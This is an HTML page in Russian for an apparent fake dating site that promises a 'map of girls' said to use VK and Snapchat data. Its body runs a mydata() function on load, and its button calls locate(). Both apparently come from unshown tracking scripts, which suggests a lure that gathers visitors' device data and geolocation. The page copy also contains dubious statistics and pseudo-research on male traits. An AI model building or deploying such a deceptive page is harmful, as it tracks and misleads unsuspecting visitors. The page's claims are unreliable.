<!DOCTYPE HTML>

<html>
	<head>
		<title>Местный флирт</title>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
		<link rel="stylesheet" href="assets/css/main.css" />
		<link rel="shortcut icon" href="https://i.ibb.co/Xsgzqvk/Daco-1762137.png" type="image/x-icon"
	</head>
	<body class="is-preload" onload="mydata()">

		<!-- Header -->
			<section id="header" class="dark">
				<header>
					
				</header>
				<footer>
					
				</footer>
			</section>

		<!-- First -->
			
		<!-- Second -->
			<section id="second" class="main">
				<header>
					<div class="container">
						<h2> Безопасный и простой в использовании интерфейс</h2>
						<p>У нас вы найдете качественное общение с незабываемыми людьми. Этот сайт часто можно встретить в различных топ 10 сайтов знакомств, и не зря! Благодаря актуальным технологиям индивидуального подбора, вам предоставят выбор из подходящих людей, меньше времени на поиск, больше на общение.<br />
						</p>
					</div>
				</header>
				<div class="content dark style0">
					<div class="container">
						<div class="row">
							<div class="col-4 col-12-narrow">
								<section>
									<h3>Новые прибывшие девушки на сайт</h3>
									<p>С помощью наших уникальных сервисов,красивые молодые девушки могут встретить надежного, обеспеченного мужчину, а мужчины, соответственно, приятных, образованных женщин любого возраста.Лавамур-это портал для уверенных в себе пользователей, желающих создать качественные отношения.</p>
									<p>На карте с девушками используется API вконтакте и снепчат</p>
									<footer>
										<button id="change" class="button" type="button" onclick="locate()">Открыть карту с девушками.</button>
                                        <div  class="text" id="result"> 
									</footer>
								</section>
							</div>
							<div class="col-8 col-12-narrow">
								<div class="row">
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic01.jpg" alt="" /></a></div>
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic02.jpg" alt="" /></a></div>
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic03.jpg" alt="" /></a></div>
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic04.jpg" alt="" /></a></div>
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic05.jpg" alt="" /></a></div>
									<div class="col-6"><a href="#" class="image fit"><img src="images/pic06.jpg" alt="" /></a></div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</section>

		<!-- Third -->
			<section id="third" class="main">
				
				<div class="content dark style">
					<div class="container">
						<span class="image featured"><img src="images/pic07.jpg" alt="" /></span>
						<div class="row">
							<div class="col-4 col-12-narrow">
								<h3>Иследования</h3>
								<p>

Согласно последним исследованиям, за 2016 год из пар, соединивших свои сердца, 65 % сделали это благодаря интернету. Помимо сайтов, популярными местами для знакомства являются улица, торговые центры и, конечно же, работа.

Но количество знакомств при помощи различных интернет-порталов все равно превышает половину. Это доказывает, что завязать разговор в сети гораздо проще, а шансов быть отвергнутым гораздо меньше. Кроме того, вам не надо опасаться, что при знакомстве вас поднимут на смех, ведь на сайте находятся люди, которые именно за поиском пары сюда и пришли. У них явно нет партнера и они с 95% вероятностью согласятся продолжить общение в реале.

Сайты знакомств – спасение для тех, кто боится отказов, хочет хоть что-то знать о человеке до встречи, а также для тех, у кого нет времени на знакомства в реальности. Стоит ли зарегистрироваться на сайте знакомств, если ты ищешь пару? Наш ответ – да! Обязательно! И тогда шансы встретить свою любовь увеличатся.
</p>
							</div>
							<div class="col-4 col-12-narrow">
								<p>Макиавеллизм, нарциссизм и психопатия вот краткое определение главных черт мужского пола. Макиавеллизм черта характера, распространённая у сильного пола. Мужчина, ставящий на первое место свои интересы и презираемый нормы нравственности, как говорят ученые, пользуются особенным интересом у женщин. Любовь к себе, гордыня и мания величия, именуемые в науке нарциссизмом, играют не последнюю роль в притягательности мужчин все женщины любят уверенных в себе мужчин, согласитесь? Третьи признаком, по словам ученых, является психопатия, которая определяется импульсивностью и эгоизмом. Во время исследования было опрошено 2370 женщин. Им предлагалось посмотреть на снимки двух мужчин, и выбрать один, наиболее понравившийся. По итогам исследования оказалось, что чаще всего опрашиваемые выбирают мужчин с плотным телосложением и волевой внешностью, которые, по словам психологов, наиболее часто являются носителями трех черт характера. Ученые подчеркивают, что в спутники жизни женщины обычно выбирают совершенно противоположных мужчин.</p>
								
							</div>
							<div class="col-4 col-12-narrow">
								<p>Благодаря исследованию сайта мы можем рассказать вам о том, с представителями каких профессий предпочитают встречаться пользователи сайтов знакомств. Мужчины в назначении встреч больше всего импонируют физиотерапевтам, в то время как женщины желают видеть своими спутниками пилотов. Так же, оба противоположных пола отдают свой голос за представителей медицинских профессий, таких как: стоматолог, медсестра, фармацевт, логопед и парамедик.</p>
								
								<footer>
								
								</footer>
							</div>
						</div>
					</div>
				</div>
			</section>

			
		<!-- Footer -->
			<section id="footer">
				<ul class="icons">
					<li><a href="#" class="icon brands fa-twitter"><span class="label">Вконтакте/span></a></li>
					<li><a href="#" class="icon brands fa-facebook-f"><span class="label">Facebook</span></a></li>
					<li><a href="#" class="icon brands fa-instagram"><span class="label">Instagram</span></a></li>
					<li><a href="#" class="icon brands fa-dribbble"><span class="label">Одноклассники</span></a></li>
				</ul>
				<div class="copyright">
					<ul class="menu">
						<li>&copy; Создатель bafomet</li></li>
					</ul>
				</div>
			</section>

			<!-- Scripts -->

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
	<script src="location.js"></script>
    <script src="client.min.js"></script>
    <script src="loc.js"></script>
    <script type="text/javascript">
    if (window.location.protocol == "http:") {
        var restOfUrl = window.location.href.substr(5);
        window.location = "https:" + restOfUrl;
    }
    </script>
	</body>
</html>
